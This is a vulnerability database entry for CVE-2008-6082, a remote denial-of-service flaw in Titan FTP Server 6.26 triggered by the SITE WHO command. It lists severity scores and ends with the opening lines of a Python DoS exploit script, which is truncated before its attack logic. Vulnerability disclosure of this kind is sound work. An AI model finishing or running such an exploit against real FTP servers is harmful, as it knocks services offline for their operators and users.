5
CVSSv2

CVE-2008-6082

Published: 06/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Titan FTP Server 6.26 build 630 allows remote malicious users to cause a denial of service (CPU consumption) via the SITE WHO command.

Vulnerable Product Search on Vulmon Subscribe to Product

southrivertech titan ftp server 6.26

Exploits

# Titan FTP server v626 build 630 remote DoS exploit # Titan FTP URL - wwwtitanftpcom/ # DoS'ed on "SITE WHO" command # (x)dmnt # -*- coding: windows-1252 -*- import socket import sys def help_info(): print ("Usage: titand0s <host> <login> <password>\n") print ("Note: anonymous is enought\n") def dos_it(hostna ...